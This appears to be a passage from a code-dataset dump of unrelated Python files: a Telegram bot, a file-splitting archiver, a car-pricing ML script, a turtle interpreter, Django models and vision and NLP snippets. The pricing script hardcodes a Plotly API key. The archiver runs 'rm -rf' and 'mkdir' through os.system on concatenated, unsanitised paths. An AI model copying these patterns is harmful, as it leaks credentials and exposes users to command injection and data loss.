navigation footer\n navigation_footer = [InlineKeyboardButton(emojis.encode(\":arrow_left:\"), callback_data=\"city_list_back\"),\n InlineKeyboardButton(f\"{last_index}/{list_len}\", callback_data=\"do_nothing\"),\n InlineKeyboardButton(emojis.encode(\":arrow_right:\"), callback_data=\"city_list_forward\")]\n keyboard.append(navigation_footer)\n return keyboard\n\n# ==== Command Handlers ====\n# \"/start\" handler\ndef start_command(update, context):\n reply_markup = InlineKeyboardMarkup(construct_cities_list(mongo_receive_cities(), 1))\n context.bot.send_message(chat_id=update.effective_chat.id, text=text.txt_start,\n reply_markup=reply_markup)\n\n\n# \"/city\" handler\ndef city_command(update, context):\n reply_markup = InlineKeyboardMarkup(construct_cities_list(mongo_receive_cities(), 1))\n context.bot.send_message(chat_id=update.effective_chat.id, text=text.txt_available_cities,\n reply_markup=reply_markup)\n\n\n# inline query handler\n# By default chooses the city\n# Eventually I decided to use it more than once :)\ndef inline_query_handler(update, context):\n query = update.callback_query\n query.answer()\n global _cached_city_page\n global _cached_index_page\n global _cached_city\n total_pages = math.ceil(len(_cached_index_dict) / 10)\n addresses = list(_cached_index_dict.keys())\n indexes = list(_cached_index_dict.values())\n if str(query.data) == \"city_list_back\":\n if _cached_city_page <= 1:\n reply = text.txt_zero_page\n else:\n _cached_city_page -= 1\n reply = text.txt_available_cities\n reply_markup = InlineKeyboardMarkup(construct_cities_list(mongo_receive_cities(), _cached_city_page))\n query.edit_message_text(text=reply, reply_markup=reply_markup)\n\n elif str(query.data) == \"city_list_forward\":\n _cached_city_page += 1\n reply_markup = InlineKeyboardMarkup(construct_cities_list(mongo_receive_cities(), _cached_city_page))\n query.edit_message_text(text=text.txt_available_cities, reply_markup=reply_markup)\n\n elif str(query.data) == \"index_list_back\":\n print(\"Index Page: \" + str(_cached_index_page))\n print(\"Total Pages: \" + str(total_pages))\n if _cached_index_page > 1 :\n _cached_index_page = _cached_index_page - 1\n list_from = int(_cached_index_page) * 10 - 1\n list_until = list_from + 10\n addresses = addresses[list_from:list_until]\n indexes = indexes[list_from:list_until]\n\n reply_markup = construct_markup_index_list(_cached_index_page, total_pages)\n reply = construct_indexes_list(_cached_city, addresses, indexes)\n\n query.edit_message_text(text=reply, reply_markup=reply_markup, parse_mode=ParseMode.HTML)\n\n elif str(query.data) == \"index_list_forward\":\n print(\"Index Page: \" + str(_cached_index_page))\n print(\"Total Pages: \" + str(total_pages))\n if _cached_index_page <= total_pages - 1:\n _cached_index_page += 1\n list_from = int(_cached_index_page-1) * 10\n list_until = list_from + 10\n addresses = addresses[list_from:list_until]\n indexes = indexes[list_from:list_until]\n\n reply_markup = construct_markup_index_list(_cached_index_page, total_pages)\n reply = construct_indexes_list(_cached_city, addresses, indexes)\n query.edit_message_text(text=reply, reply_markup=reply_markup, parse_mode=ParseMode.HTML)\n\n elif str(query.data) == \"do_nothing\":\n pass\n\n elif str(query.data) in mongo_receive_cities():\n _cached_city = str(query.data)\n query.edit_message_text(text=text.txt_city_found)\n else:\n query.edit_message_text(text=text.txt_error)\n\n\ndef construct_indexes_list(_cached_city, addresses, indexes):\n reply = f'Город: {_cached_city}\\n'\n for x in range(0, len(addresses)):\n reply += f\"\\n{str(addresses[x])}: {str(indexes[x])}\"\n return reply\n\n\ndef construct_markup_index_list(_cached_index_page, total_pages):\n keyboard = [[InlineKeyboardButton(emojis.encode(\":arrow_left:\"), callback_data=\"index_list_back\"),\n InlineKeyboardButton(f\"{_cached_index_page}/{total_pages}\", callback_data=\"do_nothing\"),\n InlineKeyboardButton(emojis.encode(\":arrow_right:\"), callback_data=\"index_list_forward\")]]\n reply_markup = InlineKeyboardMarkup(keyboard)\n return reply_markup\n\n\n# text_handler\n# By default needs to search for index by user input\ndef index_command(update, context):\n user_input = str(update.message.text)\n global _cached_city\n global _cached_index_dict\n global _cached_index_page\n _cached_index_page = 1\n _cached_index_dict = mongo_get_index(user_input, _cached_city)\n total_pages = math.ceil(len(_cached_index_dict) / 10)\n addresses = list(_cached_index_dict.keys())\n indexes = list(_cached_index_dict.values())\n print(\"Index Page: \" + str(_cached_index_page))\n print(\"Total Pages: \" + str(total_pages))\n if len(addresses) <= 10:\n reply = text.txt_bingo + construct_indexes_list(_cached_city, addresses, indexes)\n context.bot.send_message(chat_id=update.effective_chat.id, text=reply, parse_mode=ParseMode.HTML)\n else:\n addresses = addresses[0:10]\n indexes = indexes[0:10]\n reply = construct_indexes_list(_cached_city, addresses, indexes)\n\n\n reply_markup = construct_markup_index_list(_cached_index_page, total_pages)\n\n context.bot.send_message(chat_id=update.effective_chat.id, text=text.txt_bingo)\n context.bot.send_message(chat_id=update.effective_chat.id, text=reply,\n parse_mode=ParseMode.HTML, reply_markup=reply_markup)\n\n# \"/help\" handler\n# Is a requirement of Telegram API\ndef help_command(update, context):\n context.bot.send_message(chat_id=update.effective_chat.id, text=text.txt_help,\n parse_mode=ParseMode.HTML)\n\n\n# \"/find_city \" handler\ndef find_city_command(update, context):\n cities = mongo_receive_cities()\n try:\n if not context.args:\n context.bot.send_message(chat_id=update.effective_chat.id, text=text.txt_no_input,\n parse_mode=ParseMode.HTML)\n\n else:\n _input = ''\n for word in context.args:\n _input += word\n reply_list = []\n for city in cities:\n if _input.upper() in city.upper():\n reply_list.append(city)\n if not reply_list:\n context.bot.send_message(chat_id=update.effective_chat.id, text=text.txt_no_reply,\n parse_mode=ParseMode.HTML)\n else:\n keyboard_reply = InlineKeyboardMarkup(construct_cities_list(reply_list, 1))\n context.bot.send_message(chat_id=update.effective_chat.id, text=text.txt_cities_received,\n reply_markup=keyboard_reply)\n except TypeError:\n context.bot.send_message(chat_id=update.effective_chat.id, text=text.txt_error)\n\n\n# Contains Command Handlers\ndef main():\n # Create updater\n updater = Updater(token=get_token(), use_context=True)\n dispatcher = updater.dispatcher\n # \"/start\" command\n start_handler = CommandHandler('start', start_command)\n dispatcher.add_handler(start_handler)\n # \"/city\" command\n choose_city_handler = CommandHandler('city', city_command)\n dispatcher.add_handler(choose_city_handler)\n # Here we receive the response from the inline query\n dispatcher.add_handler(CallbackQueryHandler(inline_query_handler))\n # \"/help\" command\n dispatcher.add_handler(CommandHandler('help', help_command))\n # How we handle each other text received\n text_handler = MessageHandler(Filters.text & (~Filters.command), index_command)\n dispatcher.add_handler(text_handler)\n # \"/find_city\" command\n dispatcher.add_handler(CommandHandler('find_city', find_city_command))\n\n updater.start_polling()\n\n updater.idle()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":9750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"589851170","text":"# __________ ___. .__ __\n# \\______ \\ ____ _____ ____ ____\\_ |__ | | _____ _______/ |_ ___________\n# | ___// __ \\\\__ \\ _/ ___\\/ __ \\| __ \\| | \\__ \\ / ___/\\ __\\/ __ \\_ __ \\\n# | | \\ ___/ / __ \\\\ \\__\\ ___/| \\_\\ \\ |__/ __ \\_\\___ \\ | | \\ ___/| | \\/\n# |____| \\___ >____ /\\___ >___ >___ /____(____ /____ > |__| \\___ >__|\n# \\/ \\/ \\/ \\/ \\/ \\/ \\/ \\/\n\n\n###########################################################################\n## ##\n## File Splitter ##\n## ##\n###########################################################################\n## ##\n## splits large sets of files into directories, compresses them ##\n## ##\n## USAGE: python3 fileSplitter.py -P /path/to/directory ##\n## ##\n###########################################################################\n\n#imports\nimport os\nimport subprocess\nimport math\nimport sys\nimport argparse\nimport time\n\n#get CLI arguments\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-p\", \"--path\", help=\"full path to target directory\")\nparser.add_argument(\"-t\", \"--threads\", help=\"Number of threads to use\", type=int)\nparser.add_argument(\"-s\", \"--splits\", help=\"Number archives to split files into\", type=int)\nparser.add_argument(\"-S\", \"--splitsize\", help=\"Size of archives to create (GB)\", type=int)\nargs=parser.parse_args()\nif not args.path:\n help()\n print(\"main path not provided!\")\n quit()\nelse:\n mainPath=args.path\nif not args.threads:\n print(\"Defaulting to 4 threads\")\n threads=4\nelse:\n threads=args.threads\nif args.splitsize:\n splitsize=args.splitsize\n splits=None\nif args.splits:\n splits=args.splits\n splitsize=None\nif args.splits and args.splitsize:\n print('Cannot specify splitsize and number of splits, please choose one.')\n quit()\nif not args.splits and not args.splitsize:\n print('No split size or number of splits given. Defaulting to 2GB archives...')\n splitsize=2\ndef help():\n #print some helpful stuff\n print('USAGE: python3 fileSplitter.py -P /path/to/directory')\n\n#print initial info\nprint(\"Target directory: \", mainPath)\n\nclass fileSplitter:\n #########################\n # setup and validation: #\n #########################\n def __init__(self, splitNum=2, threads=4, mainPath=mainPath):\n if not self.validatePath(mainPath):\n raise ValueError(\"Path provided is invalid\")\n print(\"Path provided is invalid, quitting\")\n quit()\n self.files=os.listdir(mainPath)\n if not self.checkSubdirectories():\n raise ValueError(\"Path provided contains subdirectories\")\n print(\"Path provided contains subdirectories, quitting\")\n quit()\n self.fileCount=len(self.files)\n self.threads=threads\n #number of subdirectories to make for splitting files:\n self.splitNum=splitNum\n self.fileSplit=[]\n self.subDirExists=False\n self.numArchives=0\n self.fileSizes={}\n self.mainPath=mainPath\n def validatePath(self, mainPath):\n #ensures path is valid on host OS\n if os.path.exists(mainPath):\n return True\n def checkSubdirectories(self):\n #ensures there are no contained subdirectories\n for f in self.files:\n if os.path.isdir(f):\n return False\n return True\n #####################\n # useful functions: #\n #####################\n def makeFileLists_splits(self):\n #makes list of lists containing files partitioned into self.splitNum partitions\n #makes empty list object\n self.fileSplit=list(range(self.splitNum))\n for f in range(self.splitNum):\n self.fileSplit[f]=[]\n for i in range(len(self.files)):\n self.fileSplit[i % self.splitNum].append(self.files[i])\n #get number of archives for other methods:\n self.numArchives=self.splitNum\n\n def makeSubdirectories(self):\n #makes the empty subdirectories on the filesystem\n if not self.numArchives:\n raise RuntimeError(\"self.numArchives not created yet\")\n return 0\n #make containing directory for the deliverable:\n os.system(\"mkdir \"+self.mainPath+\"/DELIVERABLE\")\n for i in range(self.numArchives):\n try:\n os.system(\"mkdir \"+self.mainPath+\"/set\"+str(i))\n except:\n raise RuntimeError(\"Unable to create directory\")\n print(\"Unable to create directory 'set\"+str(i)+\"', quitting\")\n quit()\n self.subDirExists=True\n\n def moveFiles(self):\n #Does the actualy file moving\n #iterate through target subdirectories, parallelizing copy process within each one\n for i in range(self.numArchives):\n print(\"Starting copy for set \"+str(i+1)+\"/\"+str(self.splitNum+1))\n processes=set()\n for f in self.fileSplit[i]:\n print(f)\n #copypasta from stackexchange- idk for sure what this is doing\n processes.add(subprocess.Popen([\"cp\", self.mainPath+\"/\"+f, self.mainPath+\"/set\"+str(i)]))\n if len(processes) >= self.threads:\n os.wait()\n processes.difference_update([p for p in processes if p.poll() is not None])\n for p in processes:\n p.communicate()\n p.wait()\n x=os.popen('echo \"\"').read()\n #I'm VERY tired of the system ignoring os.wait(), doing this instead:\n print('waiting for child processes to complete...')\n for p in processes:\n p.communicate()\n p.wait()\n x=os.popen('echo \"\"').read()\n\n def makeFileLists_size(self):\n print('Getting file sizes...')\n #make a list of dicts with file name and size\n for filename in self.files:\n self.fileSizes[filename]=os.path.getsize(self.mainPath+'/'+filename)\n #the matching algorithm: it's ineligant, but given it's not yet moving anything, this should be ok:\n print('Sorting into optimal size archives...')\n currentItem=0\n currentItemSize=0\n self.fileSplit=[[]]\n self.fileSizes=sorted(self.fileSizes.items(), key = lambda kv: kv[1], reverse=True)\n # start with empty directory, loop through files. If adding file to current set would go over size, make a new one and start again, if not, add it.\n for i in range(len(self.fileSizes)):\n #see if new file would put partition over mandated size:\n if currentItemSize+self.fileSizes[i][1]>10**9*self.splitNum and currentItem == 0: #recall it was in GB\n #if it's the first one, make it standalone instead of making a new empty one:\n self.fileSplit=[[self.fileSizes[i][0]],[]]\n currentItem=currentItem+1\n currentItemSize=0\n elif currentItemSize+self.fileSizes[i][1]>10**9*self.splitNum:\n #if yes, then start a new one:\n print('Size at {}. Starting new archive...'.format(currentItemSize))\n currentItem=currentItem+1\n currentItemSize=0\n self.fileSplit.append([self.fileSizes[i][0]])\n currentItemSize=currentItemSize+self.fileSizes[i][1]\n else:\n #if not, add it and move on:\n self.fileSplit[currentItem].append(self.fileSizes[i][0])\n currentItemSize=currentItemSize+self.fileSizes[i][1]\n #get number of archives for other methods:\n self.numArchives=len(self.fileSplit)\n\n #compression methods:\n def compressFilesTar(self):\n #Does the actualy file moving\n #iterate through target subdirectories, parallelizing copy process within each one\n processes=set()\n for i in range(self.numArchives):\n print(\"Starting compression for set \"+str(i)+\"/\"+str(self.numArchives))\n #copypasta from stackexchange- idk for sure what this is doing\n processes.add(subprocess.Popen([\"tar\", \"-czvf\", self.mainPath+\"/DELIVERABLE/set\"+str(i)+\".tar.gz\", self.mainPath+\"/set\"+str(i)]))\n if len(processes) >= self.threads:\n os.wait()\n processes.difference_update([p for p in processes if p.poll() is not None])\n print('waiting for child processes to complete...')\n for p in processes:\n p.communicate()\n p.wait()\n x=os.popen('echo \"\"').read()\n def compressFilesZip(self):\n #Does the actualy file moving\n #iterate through target subdirectories, parallelizing copy process within each one\n processes=set()\n for i in range(self.numArchives):\n print(\"Starting compression for set \"+str(i)+\"/\"+str(self.numArchives))\n #copypasta from stackexchange- idk for sure what this is doing\n processes.add(subprocess.Popen([\"zip\", \"-r\", \"-j\", self.mainPath+\"/DELIVERABLE/set\"+str(i)+\".zip\", self.mainPath+\"/set\"+str(i)]))\n if len(processes) >= self.threads:\n os.wait()\n processes.difference_update([p for p in processes if p.poll() is not None])\n print('waiting for child processes to complete...')\n for p in processes:\n p.communicate()\n p.wait()\n x=os.popen('echo \"\"').read()\n def compressFilesRar(self):\n #Does the actualy file moving\n #iterate through target subdirectories, parallelizing copy process within each one\n processes=set()\n for i in range(self.numArchives):\n print(\"Starting compression for set \"+str(i)+\"/\"+str(self.numArchives))\n #copypasta from stackexchange- idk for sure what this is doing\n #\"q\" should suppress output so it isn't annoying like with the tarball method\n processes.add(subprocess.Popen([\"rar\", \"a\", self.mainPath+\"/DELIVERABLE/set\"+str(i)+\".rar\", self.mainPath+\"/set\"+str(i)]))\n if len(processes) >= self.threads:\n os.wait()\n processes.difference_update([p for p in processes if p.poll() is not None])\n print('waiting for child processes to complete...')\n for p in processes:\n p.communicate()\n p.wait()\n x=os.popen('echo \"\"').read()\n #ending tasks:\n def makeManifest(self):\n #make manifests for each archive\n for i in range(self.numArchives):\n print(\"Creating manifest for set\"+str(i))\n filelink=open(self.mainPath+\"/DELIVERABLE/set\"+str(i)+\"_file_list.txt\",\"w+\")\n for f in self.fileSplit[i]:\n filelink.write(f+\"\\n\")\n filelink.close()\n def cleanSubDirectories(self):\n #remove all the subdirectories now that we have archives\n for i in range(self.numArchives):\n os.system(\"rm -rf \"+self.mainPath+\"/set\"+str(i))\n\n#used for development- ignore this\n#def makeTestCase(n):\n# for i in range(n):\n# os.system('echo \"hello\" >> '+str(i)+'.txt')\n#os.system(\"rm -rf \"+mainPath+\"/set*\")\n#os.system(\"rm -rf \"+mainPath+\"/DELIVERABLE\")\n#makeTestCase(40000)\n\n\n#instantiate object\nif splits:\n obj=fileSplitter(splitNum=splits, threads=threads)\nelse:\n obj=fileSplitter(threads=threads)\n#display some info\nprint(\"Found \"+str(obj.fileCount)+\" files.\")\nprompt=input(\"Proceed? (y/n) \")\nif prompt.lower()=='y':\n loop=True\n method=''\n while loop==True:\n prompt=input(\"Select compression method:\\n 1.) .tar.gz\\n 2.) .zip (requires 'zip' package- DO NOT USE WITHOUT)\\n 3.) .rar (requires 'rar' package- DO NOT USE WITHOUT)\\n 4.) quit\\n\")\n if prompt not in ['1','2','3','4']:\n print(\"invalid selection!\")\n else:\n method=prompt\n loop=False\n if method=='4':\n quit()\n if splitsize:\n obj.makeFileLists_size()\n obj.makeSubdirectories()\n else:\n obj.makeFileLists_splits()\n obj.makeSubdirectories()\n obj.moveFiles()\n obj.makeManifest()\n if method=='1':\n obj.compressFilesTar()\n if method=='2':\n obj.compressFilesZip()\n if method=='3':\n obj.compressFilesRar()\n obj.cleanSubDirectories()\nprint(\"complete!\")\n","sub_path":"fileSplitter.py","file_name":"fileSplitter.py","file_ext":"py","file_size_in_byte":12778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"313032230","text":"import numpy as np\r\nimport pandas as pd\r\nimport seaborn as sns\r\nfrom sklearn.datasets import load_iris\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.ensemble import RandomForestRegressor\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.metrics import r2_score\r\nfrom sklearn import datasets, linear_model\r\nimport plotly\r\nimport plotly.plotly as py\r\nimport plotly.graph_objs as go\r\n\r\ndata = pd.read_csv(\"/home/valentin/GitHub/data/CrawlerFord.csv\")\r\n#data = pd.read_csv(\"Q:\\ProjetsInternes\\PricingVO\\donnees\\CrawlerCitroen.csv\",encoding=\"utf-8\")\r\n#data['mode'].unique()\r\n#len(data['version'].unique())\r\n\r\ndata = data.drop(data.columns[0], axis=1)\r\n\r\n####################\r\n## PLOTING ZONE ####\r\n####################\r\ndata\r\n\r\ndata_sub = data[data['mode']==\"FORD FIESTA 5\"]\r\nlen(data_sub)\r\ndata_sub\r\nplt.plot(data_sub.prix,data_sub.km,'ro')\r\nplt.show()\r\n\r\nplt.plot(data_sub['prix'],data_sub['annee'],'ro')\r\nplt.show()\r\n\r\nplotly.tools.set_credentials_file(username='valentin.lefranc', api_key='Xb0HU4LGnX8h3COhUgJr')\r\n\r\nlen(data_sub)\r\ndata_sub.columns\r\nmsk = np.random.rand(len(data_sub)) < 0.8\r\ndata_subtrain = data_sub[msk]\r\ndata_subtest = data_sub[~msk]\r\n\r\nlen(data_subtrain)\r\n############# Random RandomForest\r\nfeatures = data_subtrain.columns[[3,4,5,7]]\r\ny = data_subtrain['prix']\r\nclf = RandomForestRegressor(n_estimators=20)\r\nclf.fit(data_subtrain[features], y)\r\ny_test = data_subtest['prix']\r\n\r\ndata_subtest['prediction'] = clf.predict(data_subtest[features])\r\ndata_subtest['error'] = (data_subtest['prix'] - clf.predict(data_subtest[features]))/data_subtest['prix']\r\nhist = [go.Histogram(x=data_subtest['error'])]\r\npy.iplot(hist, filename='basic histogram')\r\n\r\n\r\nEmoy = np.sum( abs(data_subtest['error']) )/len(data_subtest.index)\r\nEmoy\r\n\r\n############# Regression linear\r\nfeatures = data_subtrain.columns[[3,4,5,7]]\r\ny = data_subtrain['prix']\r\nclf = linear_model.LinearRegression()\r\nclf.fit(data_subtrain[features], y)\r\ny_test = data_subtest['prix']\r\n\r\ndata_subtest['prediction'] = clf.predict(data_subtest[features])\r\ndata_subtest['error'] = (data_subtest['prix'] - clf.predict(data_subtest[features]))/data_subtest['prix']\r\nhist = [go.Histogram(x=data_subtest['error'])]\r\npy.iplot(hist, filename='basic histogram')\r\n\r\nEmoy = np.sum( abs(data_subtest['error']) )/len(data_subtest.index)\r\nEmoy\r\n\r\n\r\n## Mot clef pour les versions\r\nNver = np.array(data['version'])\r\nAllkeyw = Nver[1].split(\" \")\r\n\r\nfor i in range(0,len(Nver)):\r\n if i == 0:\r\n Allkeyw = Nver[i].split(\" \")\r\n if i > 0:\r\n Allkeyw = np.append(Allkeyw,Nver[i].split(\" \"))\r\n\r\n\r\n\r\nAllkeyw = pd.DataFrame(Allkeyw)\r\nAllkeyw.columns = np.array(['kw'])\r\nAllkeyw_S = Allkeyw.groupby(['kw']).apply(len)\r\nAllkeyw_S = pd.DataFrame(Allkeyw_S)\r\nAllkeyw_S.columns = np.array(['oc'])\r\nAllkeyw_S = Allkeyw_S.sort_values(by =['oc'], ascending=False)\r\n# On ne garde que les mots clefs qui apparaissent plus d'une fois sur 100\r\nAllkeyw_S = Allkeyw_S[Allkeyw_S['oc'] > 0.01*len(Allkeyw)]\r\nAllkeyw_S.index[2]\r\nlen(Allkeyw_S)\r\ndata['kw'] = 1\r\na = np.linspace(0,0,len(Allkeyw_S))\r\n\r\nfor j in range(0,len(Allkeyw_S)):\r\n for i in range(0,len(data['version'])):\r\n if np.array(data['version'])[i].find(Allkeyw_S.index[j]) == -1:\r\n b=1\r\n if np.array(data['version'])[i].find(Allkeyw_S.index[j]) != -1:\r\n a[j] = a[j] + np.array(data['version'])[i].find(Allkeyw_S.index[j])\r\n\r\n a[j] = a[j]/np.array(Allkeyw_S)[j]\r\n\r\n\r\nkwdf = pd.DataFrame(np.array(Allkeyw_S.index))\r\nkwdf['pos'] = a\r\nkwdf = kwdf.sort_values(by =['pos'], ascending=True)\r\nkwdf['type'] = \"Uk\"\r\nkwdf['type'][kwdf['pos']<1] = \"Nmod\"\r\nkwdf['type'][kwdf['pos']>3 ] = \"litre\"\r\nkwdf['type'][kwdf['pos']>5 ] = \"moteur\"\r\nkwdf['type'][kwdf['pos']>10] = \"PUI\"\r\nkwdf['type'][kwdf['pos']>17] = \"OPT\"\r\n\r\nkwdf\r\n\r\ndata['litre'] = 1\r\nlitre = kwdf[kwdf['type'] == \"litre\"]\r\nlitre.columns = np.array(['litre','pos','type'])\r\n\r\nfor j in range(0,len(litre)):\r\n print(np.array(litre['litre'])[j])\r\n for i in range(0,len(data['version'])):\r\n if np.array(data['version'])[i].find( np.array(litre['litre'])[j] ) != -1:\r\n data['litre'][data.index[i]] = np.array(litre['litre'])[j]\r\n\r\ndata['moteur'] = 'moteur'\r\nmoteur = kwdf[kwdf['type'] == \"moteur\"]\r\nmoteur.columns = np.array(['moteur','pos','type'])\r\nmoteur\r\n\r\nfor j in range(0,len(moteur)):\r\n print(np.array(moteur['moteur'])[j])\r\n for i in range(0,len(data['version'])):\r\n if np.array(data['version'])[i].find( np.array(moteur['moteur'])[j] ) != -1:\r\n data['moteur'][data.index[i]] = np.array(moteur['moteur'])[j]\r\n\r\ndata_f = data\r\ndata_f = data_f.replace({'E-HDI': 1}, regex=True)\r\ndata_f = data_f.replace({'BLUEHDI': 2}, regex=True)\r\ndata_f = data_f.replace({'PURETECH': 3}, regex=True)\r\ndata_f = data_f.replace({'moteur': 0}, regex=True)\r\n\r\ndata_f\r\nErrors = np.zeros(len(np.unique(data_f['mode'])))\r\nModelsC = np.unique(data_f['mode'])\r\n\r\ni =0\r\n\r\nfor modelC in np.unique(data_f['mode']):\r\n data_sub = data_f[data_f['mode']==modelC]\r\n if len(data_sub) > 99:\r\n msk = np.random.rand(len(data_sub)) < 0.8\r\n data_subtrain = data_sub[msk]\r\n data_subtest = data_sub[~msk]\r\n\r\n ############# Random RandomForest\r\n features = data_subtrain.columns[[3,4,5,7,9,10]]\r\n y = data_subtrain['prix']\r\n clf = RandomForestRegressor(n_estimators=20)\r\n clf.fit(data_subtrain[features], y)\r\n y_test = data_subtest['prix']\r\n\r\n data_subtest['prediction'] = clf.predict(data_subtest[features])\r\n data_subtest['error'] = (data_subtest['prix'] - clf.predict(data_subtest[features]))/data_subtest['prix']\r\n #hist = [go.Histogram(x=data_subtest['error'])]\r\n #py.iplot(hist, filename='basic histogram')\r\n\r\n Emoy = np.sum( abs(data_subtest['error']) )/len(data_subtest.index)\r\n Errors[i] = Emoy\r\n i = i+1\r\n print(\"model : \" + str(modelC) + \" size: \" + str(len(data_sub)) + \" Erreur moy: \" + str(Emoy))\r\n\r\n\r\nErrors = Errors[Errors>0]\r\nnp.mean(Errors)\r\n","sub_path":"PricingFord.py","file_name":"PricingFord.py","file_ext":"py","file_size_in_byte":6018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"42049811","text":"def indent(line):\n count = 0\n for char in line:\n if char == ' ':\n count += 1\n else:\n break\n\n\n\ndef eval_turtle(program):\n\n def return_to_stack():\n if stack[-1]['count'] != 0:\n index = stack[-1]['index']\n stack[-1]['count'] -= 1\n else:\n del stack[-1]\n return_to_stack()\n\n x, y = 0, 0\n painted = set()\n stack = []\n\n index = 0\n while True:\n if index != 0 and indent(program[index]) < indent(program[index-1]):\n return_to_stack()\n continue\n\n command = program[index].split()\n\n if len(command) == 1:\n command = command[0]\n if command == 'left':\n x -= 1\n elif command == 'right':\n x += 1\n elif command == 'down':\n y -= 1\n elif command == 'up':\n y += 1\n elif command == 'paint':\n painted.add((x, y))\n else:\n if command[0] == 'loop':\n stack.append({'index': index + 1, 'count': int(command[1])})\n\n","sub_path":"ДЗ ФКН/turtle/turtle.py","file_name":"turtle.py","file_ext":"py","file_size_in_byte":1123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"533807540","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\n\nclass Profile(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n\n@receiver(post_save, sender=User)\ndef create_user_profile(sender, instance, created, **kwargs):\n if created:\n Profile.objects.create(user=instance)\n\n@receiver(post_save, sender=User)\ndef save_user_profile(sender, instance, **kwargs):\n instance.profile.save()\n\nclass Room(models.Model):\n room_id = models.AutoField(primary_key= True)\n room_name = models.CharField(max_length= 40)\n room_description = models.CharField(max_length= 200)\n # room_type=models.CharField(max_length=40)\n # room_design=models.CharField(max_length=100)\n user = models.ForeignKey(Profile, on_delete= models.CASCADE)","sub_path":"roombooking/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"629598038","text":"import tensorflow as tf\nimport numpy as np\nfrom tensorflow.keras.models import Model, load_model\nfrom tensorflow.keras import preprocessing\n\nclass NerModel:\n def __init__(self, model_name1, proprocess):\n self.index_to_ner ={1:'0',2:'B_DT',3:'B_FOOD',4:'I',5:'B_OG',6:'B_PS',7:'B_LC',8:'NNp', 9:'B_TI', 0:'PAD'}\n\n self.model = tf.keras.models.load_model(model_name1)\n self.p = proprocess\n def predict(self, query):\n pos = self.p.pos(query)\n keywords = self.p.get_keywords(pos, without_tag=True)\n sequences = [self.p.get_wordidx_sequence(keywords)]\n\n max_len = 40\n padded_seqs = preprocessing.sequence.pad_sequences(sequences, padding = 'post', value = 0, maxlen = max_len)\n\n predict = self.model.predict(np.array([padded_seqs[0]]))\n predict_class = tf.math.argmax(predict, axis = -1)\n \n tags = [self.index_to_ner[i] for i in predict_class.numpy()[0]]\n return list(zip(keywords, tags))\n\n def predict_tags(self, query):\n pos = self.p.pos(query)\n keywords = self.p.get_keywords(pos, without_tag = True)\n sequences = [self.p.get_wordidx_sequence(keywords)]\n\n max_len = 40\n padded_seqs = preprocessing.sequence.pad_sequences(sequences, padding = 'post', value = 0, maxlen = max_len)\n\n predict = self.model.predict(np.array([padded_seqs[0]]))\n predict_class = tf.math.argmax(predict, axis = -1)\n tags = []\n\n for tag_idx in predict_class.numpy()[0]:\n if tag_idx == 1: continue\n tags.append(self.index_to_ner[tag_idx])\n if len(tags) == 0:\n return None\n return tags","sub_path":"data_visualization/deeplearning/chatbot/test/NerModel.py","file_name":"NerModel.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"11597239","text":"#!/usr/bin/env python\n#\n# Identify and draw our lane and expected path of travel.\n# Identify and frame nearby vehicles.\n\nfrom moviepy.editor import VideoFileClip\n\nfrom zone import LaneBoundaryZone, VehicleCollisionZone\n\nimport lesson_functions\n\ndef lane_car_locate_pipeline(vehicle_zone, lane_zone):\n \"\"\"Return a function that takes an image and runs the pipeline identifying lane boundaries and nearby cars.\"\"\"\n def _lane_car_locate_pipeline(rgb_img):\n \"\"\"Run both vehicle_zone and lane_zone pipelines.\"\"\"\n car_matches = vehicle_zone.locate_nearby_cars(rgb_img)\n lane_img = lane_zone.locate_lane_bounds(rgb_img)\n return lesson_functions.draw_boxes(lane_img, car_matches)\n return _lane_car_locate_pipeline\n\ndef main():\n \"\"\"Start here...\"\"\"\n # Create a frane iterator of the project video to run our pipeline on each frame.\n project_video = VideoFileClip('./project_video.mp4')\n\n # Determine dimensions of the video.\n sample_img_shape = project_video.get_frame(0).shape\n\n # Create the pipeline function.\n vehicle_zone = VehicleCollisionZone()\n lane_zone = LaneBoundaryZone(sample_img_shape[0], sample_img_shape[1])\n pipeline_fn = lane_car_locate_pipeline(vehicle_zone, lane_zone)\n\n # Pass the pipeline function to the iterator and fire it up saving the resulting stream to a video file.\n project_video_pipeline = project_video.fl_image(pipeline_fn)\n project_video_pipeline.write_videofile('./output_videos/project_video_pipeline.mp4', audio=False)\n\nif __name__ == '__main__':\n main()\n","sub_path":"locate_lane_and_cars.py","file_name":"locate_lane_and_cars.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"375906972","text":"##########################################################################\n# NSAp - Copyright (C) CEA, 2013\n# Distributed under the terms of the CeCILL-B license, as published by\n# the CEA-CNRS-INRIA. Refer to the LICENSE file or to\n# http://www.cecill.info/licences/Licence_CeCILL-B_V1-en.html\n# for details.\n##########################################################################\n\n# Cubicweb import\nfrom cubicweb.predicates import is_instance\nfrom cubicweb.view import EntityView\n\n# Brainomics import\nfrom cubes.brainomics.views.outofcontext import ScanOutOfContextView\nfrom cubes.brainomics.views.outofcontext import AssessmentOutOfContextView\nfrom cubes.brainomics.views.outofcontext import QuestionnaireRunOutOfContextView\nfrom cubes.brainomics.views.outofcontext import SubjectOutOfContextView\n\n# PIWS import\nfrom components import AUTHORIZED_IMAGE_EXT\n\n\n###############################################################################\n# Base\n###############################################################################\n\nclass BaseOutOfContextView(EntityView):\n __regid__ = \"outofcontext\"\n __select__ 